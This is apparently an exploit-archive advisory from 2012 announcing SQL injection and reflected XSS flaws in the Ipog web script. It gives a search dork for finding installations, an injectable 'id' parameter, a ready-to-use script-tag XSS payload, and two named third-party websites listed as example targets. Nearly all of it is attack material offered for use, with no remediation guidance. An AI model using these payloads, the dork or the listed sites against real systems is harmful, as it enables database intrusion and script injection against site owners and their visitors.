id: 18336
date: 05/23/2012
title: Ipog Sql injection/Reflected XSS Vulnerabilties
author: AtT4CKxT3rR0r1ST
cves: 

Ipog  Sql injection/Reflected XSS Vulnerabilties
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.ipog.com/
.:. Drok           : "Powered By Ipog"

####################################################################

===[ Exploit ]===

Sql Injection
===============

http://SITE/main.php?id=21[sql]

REflected XSS
======================

http://SITE/main.php?id='"--></style></script><script>alert(1337)</script>

Exapmle
========

http://www.calvarytyler.org/_pages/main.php?id=21
http://www.interlink-res.com/_pages/main.php?c=news&id=21

####################################################################



#  0day.today [2023-03-22]  #